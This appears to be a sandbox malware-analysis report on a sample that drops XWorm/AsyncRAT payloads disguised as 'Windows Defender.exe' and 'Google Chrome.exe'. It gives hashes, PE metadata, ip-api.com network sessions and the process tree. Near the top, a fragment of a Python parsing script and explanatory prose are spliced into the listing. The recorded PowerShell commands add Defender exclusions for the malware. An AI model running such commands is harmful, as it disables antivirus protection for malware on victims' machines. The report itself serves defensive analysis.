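• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe, Author: ditekSHen
Antivirus:
• Antivirus: Avira, Detection: 100%
Preview:MZ......................@...............
"""
PS_RECORD = r"""
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
"""
SAMPLE_LISTING = PE_RECORD + PS_RECORD * 3
```

Feed `triage()` the text of a complete dropped-file listing: `duplicates_by_sha256` separates the repeated probe files from the handful of unique artefacts worth pulling for static analysis, and `flagged` lists the reasons per unique SHA-256. The parser keys a new record on the `Process:` line because the per-file name header is not present in this export; the on-disk path of a flagged file is recovered from the Yara `Source:` field instead.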
                                                  23 further records identical to the one above (same process, file type, 60-byte size, hashes and preview) follow at this point in the report; powershell.exe writes one such AppLocker policy test file at every start, so the repetition reflects repeated PowerShell launches during the analysis rather than additional distinct payloads.
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit):5.138378464049447
                                                  TrID:
                                                  • Win64 Executable GUI Net Framework (217006/5) 49.88%
                                                  • Win64 Executable GUI (202006/5) 46.43%
                                                  • Win64 Executable (generic) (12005/4) 2.76%
                                                  • Generic Win/DOS Executable (2004/3) 0.46%
                                                  • DOS Executable Generic (2002/1) 0.46%
                                                  File name:X.exe
                                                  File size:10'559'488 bytes
                                                  MD5:edf2d391a87307c0d10482da0aa93e6f
                                                  SHA1:017acb50488e7a3e17c9e90eed8dec6c100a9792
                                                  SHA256:c492044065d21e049097e0cde12f57be6eca492a097d790a9b192a62d70fd07d
                                                  SHA512:b523085f35ccdf506fced0bdb7c60d8ea2b04d505c3311a8403db7de6fc6989c12915320385069a65fee706bb36557125506f5cc0f129b96f6dc3260cc2fa9db
                                                  SSDEEP:24576:ciZe9R2HNNQeAKDwfSKwhrUBv2n7L8bo8sv03D/25ZuJH8Q4BeAd8N5r0IFqENkW:tZe9gHbSJqAO7m9KQOCCx6aI5A/J
                                                  TLSH:D1B67155A261B214FB4CB330194CFE3A57B0A97516B88EC39EE7F5712CA1C396E09336
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f.........."...................... .....@..... .......................`............@...@......@............... .....
                                                  Icon Hash:00928e8e8686b000
                                                  Entrypoint:0x140000000
                                                  Entrypoint Section:
                                                  Digitally signed:false
                                                  Imagebase:0x140000000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x66FD2EB6 [Wed Oct 2 11:29:58 2024 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:v4.0.30319
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:
                                                  Instruction
                                                  dec ebp
                                                  pop edx
                                                  nop
                                                  add byte ptr [ebx], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax+eax], al
                                                  add byte ptr [eax], al
                                                   Name | Virtual Address | Virtual Size | Is in Section
                                                   IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                   IMAGE_DIRECTORY_ENTRY_IMPORT | 0x0 | 0x0 |
                                                   IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xa14000 | 0x4b6 | .rsrc
                                                   IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                   IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                   IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                   IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                   IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                   IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                   IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                   IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                   IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                   IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                                                   IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                   IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2000 | 0x48 | .text
                                                   IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                   Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                   .text | 0x2000 | 0xa11714 | 0xa11800 | 5fa565b41ea169c2d64c217dcaaf5b70 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                   .rsrc | 0xa14000 | 0x4b6 | 0x600 | 1fb236da24f690addedcf16f0e5701b8 | False | 0.3717447916666667 | data | 3.6927603228216808 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                   Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                   RT_VERSION | 0xa140a0 | 0x22c | data | | | 0.4784172661870504
                                                   RT_MANIFEST | 0xa142cc | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041
                                                   Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                   Oct 8, 2024 14:02:34.331815958 CEST | 49805 | 80 | 192.168.2.7 | 208.95.112.1
                                                   Oct 8, 2024 14:02:34.336925030 CEST | 80 | 49805 | 208.95.112.1 | 192.168.2.7
                                                   Oct 8, 2024 14:02:34.337344885 CEST | 49805 | 80 | 192.168.2.7 | 208.95.112.1
                                                   Oct 8, 2024 14:02:34.337344885 CEST | 49805 | 80 | 192.168.2.7 | 208.95.112.1
                                                   Oct 8, 2024 14:02:34.342430115 CEST | 80 | 49805 | 208.95.112.1 | 192.168.2.7
                                                   Oct 8, 2024 14:02:34.825663090 CEST | 80 | 49805 | 208.95.112.1 | 192.168.2.7
                                                   Oct 8, 2024 14:02:34.880623102 CEST | 49805 | 80 | 192.168.2.7 | 208.95.112.1
                                                   Oct 8, 2024 14:02:59.284681082 CEST | 49949 | 80 | 192.168.2.7 | 208.95.112.1
                                                   Oct 8, 2024 14:02:59.289844990 CEST | 80 | 49949 | 208.95.112.1 | 192.168.2.7
                                                   Oct 8, 2024 14:02:59.290594101 CEST | 49949 | 80 | 192.168.2.7 | 208.95.112.1
                                                   Oct 8, 2024 14:02:59.290990114 CEST | 49949 | 80 | 192.168.2.7 | 208.95.112.1
                                                   Oct 8, 2024 14:02:59.295865059 CEST | 80 | 49949 | 208.95.112.1 | 192.168.2.7
                                                   Oct 8, 2024 14:02:59.757348061 CEST | 80 | 49949 | 208.95.112.1 | 192.168.2.7
                                                   Oct 8, 2024 14:02:59.880580902 CEST | 49949 | 80 | 192.168.2.7 | 208.95.112.1
                                                   Oct 8, 2024 14:03:34.697673082 CEST | 80 | 49949 | 208.95.112.1 | 192.168.2.7
                                                   Oct 8, 2024 14:03:34.697741032 CEST | 49949 | 80 | 192.168.2.7 | 208.95.112.1
                                                   Oct 8, 2024 14:03:54.458683014 CEST | 80 | 49805 | 208.95.112.1 | 192.168.2.7
                                                   Oct 8, 2024 14:03:54.460556030 CEST | 49805 | 80 | 192.168.2.7 | 208.95.112.1
                                                   Oct 8, 2024 14:04:14.838095903 CEST | 49805 | 80 | 192.168.2.7 | 208.95.112.1
                                                   Oct 8, 2024 14:04:14.842937946 CEST | 80 | 49805 | 208.95.112.1 | 192.168.2.7
                                                   Oct 8, 2024 14:04:39.781111956 CEST | 49949 | 80 | 192.168.2.7 | 208.95.112.1
                                                   Oct 8, 2024 14:04:40.083767891 CEST | 49949 | 80 | 192.168.2.7 | 208.95.112.1
                                                   Oct 8, 2024 14:04:40.693113089 CEST | 49949 | 80 | 192.168.2.7 | 208.95.112.1
                                                   Oct 8, 2024 14:04:41.896317959 CEST | 49949 | 80 | 192.168.2.7 | 208.95.112.1
                                                   Oct 8, 2024 14:04:44.302506924 CEST | 49949 | 80 | 192.168.2.7 | 208.95.112.1
                                                   Oct 8, 2024 14:04:49.115084887 CEST | 49949 | 80 | 192.168.2.7 | 208.95.112.1
                                                   Oct 8, 2024 14:04:58.724345922 CEST | 49949 | 80 | 192.168.2.7 | 208.95.112.1
                                                   Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                   Oct 8, 2024 14:02:14.549685001 CEST | 56254 | 53 | 192.168.2.7 | 1.1.1.1
                                                   Oct 8, 2024 14:02:34.315483093 CEST | 59924 | 53 | 192.168.2.7 | 1.1.1.1
                                                   Oct 8, 2024 14:02:34.324618101 CEST | 53 | 59924 | 1.1.1.1 | 192.168.2.7
                                                   Oct 8, 2024 14:02:59.260970116 CEST | 51747 | 53 | 192.168.2.7 | 1.1.1.1
                                                   Oct 8, 2024 14:02:59.269258022 CEST | 53 | 51747 | 1.1.1.1 | 192.168.2.7
                                                   Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                   Oct 8, 2024 14:02:14.549685001 CEST | 192.168.2.7 | 1.1.1.1 | 0xd9b6 | Standard query (0) | time.windows.com | A (IP address) | IN (0x0001) | false
                                                   Oct 8, 2024 14:02:34.315483093 CEST | 192.168.2.7 | 1.1.1.1 | 0xe86c | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
                                                   Oct 8, 2024 14:02:59.260970116 CEST | 192.168.2.7 | 1.1.1.1 | 0x4fbd | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
                                                   Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                   Oct 8, 2024 14:02:14.559727907 CEST | 1.1.1.1 | 192.168.2.7 | 0xd9b6 | No error (0) | time.windows.com | twc.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
                                                   Oct 8, 2024 14:02:15.635993004 CEST | 1.1.1.1 | 192.168.2.7 | 0xd18d | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | azurefd-t-fb-prod.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
                                                   Oct 8, 2024 14:02:15.635993004 CEST | 1.1.1.1 | 192.168.2.7 | 0xd18d | No error (0) | dual.s-part-0017.t-0009.fb-t-msedge.net | s-part-0017.t-0009.fb-t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
                                                   Oct 8, 2024 14:02:15.635993004 CEST | 1.1.1.1 | 192.168.2.7 | 0xd18d | No error (0) | s-part-0017.t-0009.fb-t-msedge.net | | 13.107.253.45 | A (IP address) | IN (0x0001) | false
                                                   Oct 8, 2024 14:02:34.324618101 CEST | 1.1.1.1 | 192.168.2.7 | 0xe86c | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
                                                   Oct 8, 2024 14:02:59.269258022 CEST | 1.1.1.1 | 192.168.2.7 | 0x4fbd | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
                                                  • ip-api.com
                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                   0 | 192.168.2.7 | 49805 | 208.95.112.1 | 80 | 2548 | C:\Users\user\AppData\Local\Temp\Windows Defender.exe
                                                   Timestamp | Bytes transferred | Direction | Data
                                                   Oct 8, 2024 14:02:34.337344885 CEST | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
                                                   Host: ip-api.com
                                                   Connection: Keep-Alive
                                                   Oct 8, 2024 14:02:34.825663090 CEST | 175 | IN | HTTP/1.1 200 OK
                                                   Date: Tue, 08 Oct 2024 12:02:33 GMT
                                                   Content-Type: text/plain; charset=utf-8
                                                   Content-Length: 6
                                                   Access-Control-Allow-Origin: *
                                                   X-Ttl: 42
                                                   X-Rl: 43
                                                   Data Raw: 66 61 6c 73 65 0a
                                                   Data Ascii: false


                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                   1 | 192.168.2.7 | 49949 | 208.95.112.1 | 80 | 6568 | C:\Users\user\AppData\Local\Temp\Google Chrome.exe
                                                   Timestamp | Bytes transferred | Direction | Data
                                                   Oct 8, 2024 14:02:59.290990114 CEST | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
                                                   Host: ip-api.com
                                                   Connection: Keep-Alive
                                                   Oct 8, 2024 14:02:59.757348061 CEST | 175 | IN | HTTP/1.1 200 OK
                                                   Date: Tue, 08 Oct 2024 12:02:58 GMT
                                                   Content-Type: text/plain; charset=utf-8
                                                   Content-Length: 6
                                                   Access-Control-Allow-Origin: *
                                                   X-Ttl: 17
                                                   X-Rl: 42
                                                   Data Raw: 66 61 6c 73 65 0a
                                                   Data Ascii: false



                                                  Target ID:0
                                                  Start time:08:02:17
                                                  Start date:08/10/2024
                                                  Path:C:\Users\user\Desktop\X.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\Desktop\X.exe"
                                                  Imagebase:0x120000
                                                  File size:10'559'488 bytes
                                                  MD5 hash:EDF2D391A87307C0D10482DA0AA93E6F
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1750706228.00000000140F8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1750706228.00000000140F8000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:2
                                                  Start time:08:02:20
                                                  Start date:08/10/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Windows Defender.exe'
                                                  Imagebase:0x7ff741d30000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:3
                                                  Start time:08:02:20
                                                  Start date:08/10/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:5
                                                  Start time:08:02:31
                                                  Start date:08/10/2024
                                                  Path:C:\Users\user\AppData\Local\Temp\Windows Defender.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user~1\AppData\Local\Temp\Windows Defender.exe"
                                                  Imagebase:0x170000
                                                  File size:87'552 bytes
                                                  MD5 hash:E9FF85404CBD9C9DF15E13D0E4B960B1
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000005.00000000.1475029676.0000000000172000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000005.00000000.1475029676.0000000000172000.00000002.00000001.01000000.00000009.sdmp, Author: ditekSHen
                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe, Author: Joe Security
                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe, Author: ditekSHen
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 82%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:false

                                                  Target ID:6
                                                  Start time:08:02:31
                                                  Start date:08/10/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Google Chrome.exe'
                                                  Imagebase:0x7ff741d30000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:7
                                                  Start time:08:02:31
                                                  Start date:08/10/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:9
                                                  Start time:08:02:35
                                                  Start date:08/10/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Defender.exe'
                                                  Imagebase:0x7ff741d30000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:10
                                                  Start time:08:02:35
                                                  Start date:08/10/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:11
                                                  Start time:08:02:41
                                                  Start date:08/10/2024
                                                  Path:C:\Users\user\AppData\Local\Temp\Windows Defender.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\AppData\Local\Temp\Windows Defender.exe"
                                                  Imagebase:0x7d0000
                                                  File size:87'552 bytes
                                                  MD5 hash:E9FF85404CBD9C9DF15E13D0E4B960B1
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:12
                                                  Start time:08:02:50
                                                  Start date:08/10/2024
                                                  Path:C:\Users\user\AppData\Local\Temp\Windows Defender.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\AppData\Local\Temp\Windows Defender.exe"
                                                  Imagebase:0xea0000
                                                  File size:87'552 bytes
                                                  MD5 hash:E9FF85404CBD9C9DF15E13D0E4B960B1
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:13
                                                  Start time:08:02:55
                                                  Start date:08/10/2024
                                                  Path:C:\Users\user\AppData\Local\Temp\Google Chrome.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user~1\AppData\Local\Temp\Google Chrome.exe"
                                                  Imagebase:0x7ff6fee10000
                                                  File size:178'176 bytes
                                                  MD5 hash:D30B86E01EF85AA5FCF4292CB295F00F
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000D.00000000.1724078447.0000000000612000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000D.00000000.1724078447.0000000000612000.00000002.00000001.01000000.0000000A.sdmp, Author: ditekSHen
                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exe, Author: Joe Security
                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exe, Author: ditekSHen
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 92%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:false

                                                  Target ID:14
                                                  Start time:08:02:56
                                                  Start date:08/10/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\Nursultan by fruktoozik.bat" "
                                                  Imagebase:0x7ff743ec0000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:false

                                                  Target ID:15
                                                  Start time:08:02:56
                                                  Start date:08/10/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:false

                                                  Target ID:16
                                                  Start time:08:02:57
                                                  Start date:08/10/2024
                                                  Path:C:\Windows\System32\chcp.com
                                                  Wow64 process (32bit):false
                                                  Commandline:chcp 65001
                                                  Imagebase:0x7ff795bb0000
                                                  File size:14'848 bytes
                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  Target ID:17
                                                  Start time:08:03:00
                                                  Start date:08/10/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Google Chrome.exe'
                                                  Imagebase:0x7ff741d30000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:18
                                                  Start time:08:03:00
                                                  Start date:08/10/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:20
                                                  Start time:08:03:08
                                                  Start date:08/10/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Defender.exe'
                                                  Imagebase:0x7ff741d30000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:21
                                                  Start time:08:03:08
                                                  Start date:08/10/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:22
                                                  Start time:08:03:08
                                                  Start date:08/10/2024
                                                  Path:C:\Users\user\AppData\Local\Temp\Google Chrome.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\AppData\Local\Temp\Google Chrome.exe"
                                                  Imagebase:0x470000
                                                  File size:178'176 bytes
                                                  MD5 hash:D30B86E01EF85AA5FCF4292CB295F00F
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:25
                                                  Start time:08:03:16
                                                  Start date:08/10/2024
